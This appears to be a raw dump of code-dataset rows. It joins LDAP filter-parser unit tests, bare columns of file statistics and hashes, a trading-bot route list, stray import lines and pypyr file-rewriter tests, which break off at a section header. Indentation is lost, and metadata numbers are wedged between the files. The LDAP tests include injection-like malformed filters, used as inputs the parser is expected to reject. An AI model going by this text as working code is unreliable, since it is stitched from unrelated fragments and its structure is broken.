def test_escape_parens(self):
text = r'(o=Parens R Us \28for all your parenthetical needs\29)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='o'),
assertionValue=pureldap.LDAPAssertionValue(value='Parens R Us (for all your parenthetical needs)'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_escape_asterisk(self):
text = r'(cn=*\2A*)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[ pureldap.LDAPFilter_substrings_any(value='*'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text.lower())
def test_escape_backslash(self):
text = r'(filename=C:\5cMyFile)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='filename'),
assertionValue=pureldap.LDAPAssertionValue(value=r'C:\MyFile'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_escape_binary(self):
text = r'(bin=\00\00\00\04)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='bin'),
assertionValue=pureldap.LDAPAssertionValue(value='\00\00\00\04'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
def test_escape_utf8(self):
text = r'(sn=Lu\c4\8di\c4\87)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='sn'),
assertionValue=pureldap.LDAPAssertionValue(value='Lu\xc4\x8di\xc4\x87'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
#self.assertEqual(filt.asText(), text)
class TestValid(unittest.TestCase):
def test_item_present(self):
text = r'(cn=*)'
filt = pureldap.LDAPFilter_present(value='cn')
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_simple(self):
text = r'(cn=foo)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_init(self):
text = r'(cn=foo*)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_final(self):
text = r'(cn=*foo)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_final('foo'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_any(self):
text = r'(cn=*foo*)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_aa(self):
text = r'(cn=*foo*bar*)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_ia(self):
text = r'(cn=foo*bar*)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_iaa(self):
text = r'(cn=foo*bar*baz*)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_any('baz'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_if(self):
text = r'(cn=foo*bar)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_final('bar'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_iaf(self):
text = r'(cn=foo*bar*baz)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_final('baz'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_iaaf(self):
text = r'(cn=foo*bar*baz*quux)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_any('baz'),
pureldap.LDAPFilter_substrings_final('quux'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_af(self):
text = r'(cn=*foo*bar)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
pureldap.LDAPFilter_substrings_final('bar'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_item_substring_aaf(self):
text = r'(cn=*foo*bar*baz)'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_final('baz'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_not_item(self):
text = r'(!(cn=foo))'
filt = pureldap.LDAPFilter_not(
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo')))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_or_item(self):
text = r'(|(cn=foo)(cn=bar))'
filt = pureldap.LDAPFilter_or([
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo')),
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='bar')),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_and_item(self):
text = r'(&(cn=foo)(cn=bar))'
filt = pureldap.LDAPFilter_and([
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo')),
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='bar')),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_andornot(self):
text = r'(&(!(|(cn=foo)(cn=bar)))(sn=a*b*c*d))'
filt = pureldap.LDAPFilter_and([
pureldap.LDAPFilter_not(
pureldap.LDAPFilter_or([
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo')),
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='bar')),
])),
pureldap.LDAPFilter_substrings(
type='sn',
substrings=[pureldap.LDAPFilter_substrings_initial('a'),
pureldap.LDAPFilter_substrings_any('b'),
pureldap.LDAPFilter_substrings_any('c'),
pureldap.LDAPFilter_substrings_final('d'),
])])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_whitespace_beforeCloseParen(self):
text = r'(cn=foo )'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo '))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_whitespace_afterEq(self):
text = r'(cn= foo)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value=' foo'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
class TestInvalid(unittest.TestCase):
def test_closeParen_1(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(&(|(mail=)@*)(uid=)))(mail=*))')
def test_closeParen_2(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(|(mail=)@*)(uid=)))')
def test_closeParen_3(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(mail=)@*)')
def test_closeParen_4(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(uid=))')
def test_openParen_1(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(&(|(mail=(@*)(uid=())(mail=*))')
def test_openParen_2(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(|(mail=(@*)(uid=())')
def test_openParen_3(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(mail=(@*)')
def test_openParen_4(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
'(uid=()')
def test_whitespace_leading(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
r' (cn=foo)')
def test_whitespace_trailing(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
r'(cn=foo) ')
def test_whitespace_afterOpenParen(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
r'( cn=foo)')
def test_whitespace_beforeEq(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
r'(cn =foo)')
class TestMaybeSubstring(unittest.TestCase):
def test_item_present(self):
text = r'*'
filt = pureldap.LDAPFilter_present(value='cn')
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_simple(self):
text = r'foo'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='foo'))
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_init(self):
text = r'foo*'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_final(self):
text = r'*foo'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_final('foo'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_any(self):
text = r'*foo*'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_aa(self):
text = r'*foo*bar*'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_ia(self):
text = r'foo*bar*'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_iaa(self):
text = r'foo*bar*baz*'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_any('baz'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_if(self):
text = r'foo*bar'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_final('bar'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_iaf(self):
text = r'foo*bar*baz'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_final('baz'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_iaaf(self):
text = r'foo*bar*baz*quux'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_initial('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_any('baz'),
pureldap.LDAPFilter_substrings_final('quux'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_af(self):
text = r'*foo*bar'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
pureldap.LDAPFilter_substrings_final('bar'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_item_substring_aaf(self):
text = r'*foo*bar*baz'
filt = pureldap.LDAPFilter_substrings(
type='cn',
substrings=[pureldap.LDAPFilter_substrings_any('foo'),
pureldap.LDAPFilter_substrings_any('bar'),
pureldap.LDAPFilter_substrings_final('baz'),
])
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
def test_escape_simple(self):
text = r'f\2aoo(bar'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='f*oo(bar'))
self.assertEqual(ldapfilter.parseMaybeSubstring('cn', text), filt)
class TestWhitespace(unittest.TestCase):
def test_escape(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
r'(cn=\ 61)')
| 41.735675
| 111
| 0.60171
| 2,056
| 22,579
| 6.455253
| 0.071984
| 0.161392
| 0.175105
| 0.086799
| 0.896022
| 0.873192
| 0.860986
| 0.857821
| 0.824593
| 0.800708
| 0
| 0.005995
| 0.283405
| 22,579
| 540
| 112
| 41.812963
| 0.814277
| 0.004163
| 0
| 0.707006
| 0
| 0
| 0.06629
| 0.010322
| 0
| 0
| 0
| 0
| 0.233546
| 1
| 0.127389
| false
| 0.042463
| 0.006369
| 0
| 0.144374
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d24cbebbd3012a588990d77daa93d4be7a96d6fe
| 757
|
py
|
Python
|
playground/optimization/ott2butKAMA2-serenity/routes.py
|
ysdede/jesse_strategies
|
ade9f4ba42cec11207c766d267b9d8feb8bce648
|
[
"CC0-1.0"
] | 38
|
2021-09-18T15:33:28.000Z
|
2022-02-21T17:29:08.000Z
|
playground/optimization/ott2butKAMA2-serenity/routes.py
|
ysdede/jesse_strategies
|
ade9f4ba42cec11207c766d267b9d8feb8bce648
|
[
"CC0-1.0"
] | 4
|
2022-01-02T14:46:12.000Z
|
2022-02-16T18:39:41.000Z
|
playground/optimization/ott2butKAMA2-serenity/routes.py
|
ysdede/jesse_strategies
|
ade9f4ba42cec11207c766d267b9d8feb8bce648
|
[
"CC0-1.0"
] | 11
|
2021-10-19T06:21:43.000Z
|
2022-02-21T17:29:10.000Z
|
routes = [
# ('Binance Futures', 'ANCHOR!', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'FTM-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'BLZ-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'ETH-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'ZIL-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'TRX-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'LINK-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'VET-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'SOL-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'DOGE-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
]
extra_candles = []
| 47.3125
| 72
| 0.581242
| 82
| 757
| 5.353659
| 0.243902
| 0.318907
| 0.410023
| 0.47836
| 0.84738
| 0.790433
| 0.710706
| 0
| 0
| 0
| 0
| 0.046368
| 0.14531
| 757
| 15
| 73
| 50.466667
| 0.632148
| 0.087186
| 0
| 0
| 0
| 0
| 0.604651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d258df3b5bad12d5ce5d83fdfdf44febdfa1eb58
| 107
|
py
|
Python
|
modelscript/scripts/textblocks/all.py
|
ScribesZone/ModelScribes
|
a36be1047283f2e470dc2dd4353f2a714377bb7d
|
[
"MIT"
] | 1
|
2019-02-22T14:27:06.000Z
|
2019-02-22T14:27:06.000Z
|
modelscript/scripts/textblocks/all.py
|
ScribesZone/ModelScribes
|
a36be1047283f2e470dc2dd4353f2a714377bb7d
|
[
"MIT"
] | 4
|
2015-12-18T10:30:02.000Z
|
2015-12-18T10:36:28.000Z
|
modelscript/scripts/textblocks/all.py
|
ScribesZone/ModelScribes
|
a36be1047283f2e470dc2dd4353f2a714377bb7d
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import modelscript.scripts.textblocks.parser
import modelscript.scripts.textblocks.printer
| 21.4
| 45
| 0.850467
| 13
| 107
| 7
| 0.692308
| 0.373626
| 0.527473
| 0.747253
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01
| 0.065421
| 107
| 4
| 46
| 26.75
| 0.9
| 0.11215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
d2650dd2f2211c7d036080bbf5cde12de4667688
| 114
|
py
|
Python
|
bin/test/test_directory_structure.py
|
vatervonacht/dagster
|
595d78c883ef20618052ac1575fe46cde51fd541
|
[
"Apache-2.0"
] | 3
|
2020-04-28T16:27:33.000Z
|
2020-07-22T07:43:30.000Z
|
bin/test/test_directory_structure.py
|
vatervonacht/dagster
|
595d78c883ef20618052ac1575fe46cde51fd541
|
[
"Apache-2.0"
] | null | null | null |
bin/test/test_directory_structure.py
|
vatervonacht/dagster
|
595d78c883ef20618052ac1575fe46cde51fd541
|
[
"Apache-2.0"
] | 1
|
2021-02-21T12:16:47.000Z
|
2021-02-21T12:16:47.000Z
|
from ..publish import check_directory_structure
def test_directory_structure():
check_directory_structure()
| 19
| 47
| 0.824561
| 13
| 114
| 6.769231
| 0.615385
| 0.613636
| 0.522727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114035
| 114
| 5
| 48
| 22.8
| 0.871287
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d27d7ad546c79136b62fbadead09c4fcd4138d55
| 18,426
|
py
|
Python
|
tests/unit/pypyr/steps/dsl/fileinoutrewriter_test.py
|
pypyr/pypyr-cli
|
dc0f694ac0c0e3c2844c1a20788c9af586a8a16e
|
[
"Apache-2.0"
] | 31
|
2017-03-24T11:27:34.000Z
|
2020-05-27T20:06:28.000Z
|
tests/unit/pypyr/steps/dsl/fileinoutrewriter_test.py
|
pypyr/pypyr-cli
|
dc0f694ac0c0e3c2844c1a20788c9af586a8a16e
|
[
"Apache-2.0"
] | 89
|
2017-04-12T09:50:32.000Z
|
2020-08-13T13:18:36.000Z
|
tests/unit/pypyr/steps/dsl/fileinoutrewriter_test.py
|
pypyr/pypyr-cli
|
dc0f694ac0c0e3c2844c1a20788c9af586a8a16e
|
[
"Apache-2.0"
] | 6
|
2017-06-04T14:19:59.000Z
|
2020-02-10T13:16:40.000Z
|
"""fileinoutrewriter.py unit tests."""
import pytest
from unittest.mock import call, Mock, patch
from pypyr.context import Context
from pypyr.errors import KeyNotInContextError
from pypyr.steps.dsl.fileinoutrewriter import (FileInRewriterStep,
ObjectRewriterStep,
StreamRewriterStep,
StreamReplacePairsRewriterStep)
from pypyr.utils.filesystem import (ObjectRepresenter,
ObjectRewriter,
FileRewriter,
StreamRewriter)
# region FileInRewriterStep
def test_fileinrewriterstep_root_required():
"""Key root must exist."""
context = Context({'root': 'blah'})
with pytest.raises(KeyNotInContextError) as err:
FileInRewriterStep('blah.name', 'Xroot', context)
assert str(err.value) == (
"context['Xroot'] doesn't exist. It must exist for blah.name.")
def test_fileinrewriterstep_in_required():
"""Key in must exist."""
context = Context({'root': 'blah'})
with pytest.raises(KeyNotInContextError) as err:
FileInRewriterStep('blah.name', 'root', context)
assert str(err.value) == ("context['root']['in'] "
"doesn't exist. It must exist for "
"blah.name.")
def test_fileinrewriterstep_in_not_out():
"""File rewriter step instantiates with in but no out."""
context = Context({'root': {'in': 'inpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_in_and_out():
"""File rewriter step instantiates with in and out."""
context = Context({'root': {'in': 'inpathhere', 'out': 'outpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_in_and_out_with_formatting():
"""File rewriter step instantiates with in and out applies formatting."""
context = Context({'k1': 'v1',
'root': {'in': 'inpath{k1}here',
'out': 'outpath{k1}here'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathv1here'
assert obj.path_out == 'outpathv1here'
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_in_list_and_out_with_formatting():
"""File rewriter step instantiates in list & out applies formatting."""
context = Context({'k1': 'v1',
'root': {'in': ['inpath{k1}here', '2', '{k1}'],
'out': 'outpath{k1}here'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == ['inpathv1here', '2', 'v1']
assert obj.path_out == 'outpathv1here'
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_run_step():
"""File rewriter runs files_in_to_out on rewriter."""
context = Context({'root': {'in': 'inpathhere', 'out': 'outpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
mock_rewriter = Mock(spec=FileRewriter)
obj.run_step(mock_rewriter)
mock_rewriter.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
def test_fileinrewriterstep_run_step_no_out():
"""File rewriter runs files_in_to_out on rewriter with no out."""
context = Context({'root': {'in': 'inpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
mock_rewriter = Mock(spec=FileRewriter)
obj.run_step(mock_rewriter)
mock_rewriter.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
def test_fileinrewriterstep_encoding_default():
"""Default encoding from config."""
context = Context({'root': {'in': 'inpathhere'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arb'
assert obj.encoding_out == 'arb'
def test_fileinrewriterstep_encoding_in():
"""Explicitly set encoding in."""
context = Context({'root': {'in': 'inpathhere', 'encodingIn': 'arbIn'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbIn'
assert obj.encoding_out == 'arb'
def test_fileinrewriterstep_encoding_out():
"""Explicitly set encoding out."""
context = Context({'root': {'in': 'inpathhere', 'encodingOut': 'arbOut'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arb'
assert obj.encoding_out == 'arbOut'
def test_fileinrewriterstep_encoding_in_out():
"""Explicitly set encoding in & out."""
context = Context({'root': {'in': 'inpathhere',
'encodingIn': 'arbIn',
'encodingOut': 'arbOut'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbIn'
assert obj.encoding_out == 'arbOut'
def test_fileinrewriterstep_encoding_substitutions_in_out():
"""Encoding works with substitutions for in and out."""
context = Context({
'encIn': 'arbIn',
'encOut': 'arbOut',
'root': {'in': 'inpathhere',
'encodingIn': '{encIn}',
'encodingOut': '{encOut}'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbIn'
assert obj.encoding_out == 'arbOut'
def test_fileinrewriterstep_bare_encoding_substitutions():
"""Encoding works with substitutions for bare encoding."""
context = Context({
'enc': 'arbenc',
'root': {'in': 'inpathhere',
'encoding': '{enc}'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbenc'
assert obj.encoding_out == 'arbenc'
# endregion FileInRewriterStep
# region ObjectRewriterStep
@patch('pypyr.steps.dsl.fileinoutrewriter.ObjectRewriter', spec=FileRewriter)
def test_objectrewriterstep_run_step(mock_rewriter):
"""Object rewriter runs files_in_to_out on object rewriter."""
context = Context({'root': {'in': 'inpathhere',
'out': 'outpathhere',
'encodingIn': 'encIn',
'encodingOut': 'encOut'}})
obj = ObjectRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'encIn'
assert obj.encoding_out == 'encOut'
mock_representer = Mock(spec=ObjectRepresenter)
obj.run_step(mock_representer)
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.get_formatted_value,
mock_representer,
encoding_in='encIn',
encoding_out='encOut')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
@patch('pypyr.steps.dsl.fileinoutrewriter.ObjectRewriter', spec=ObjectRewriter)
def test_objectrewriterstep_run_step_no_out(mock_rewriter):
"""Object rewriter runs files_in_to_out on object rewriter with no out."""
context = Context({'root': {'in': 'inpathhere'}})
obj = ObjectRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
mock_representer = Mock(spec=ObjectRepresenter)
obj.run_step(mock_representer)
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.get_formatted_value,
mock_representer,
encoding_in=None,
encoding_out=None)
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
# endregion ObjectRewriterStep
# region StreamRewriterStep
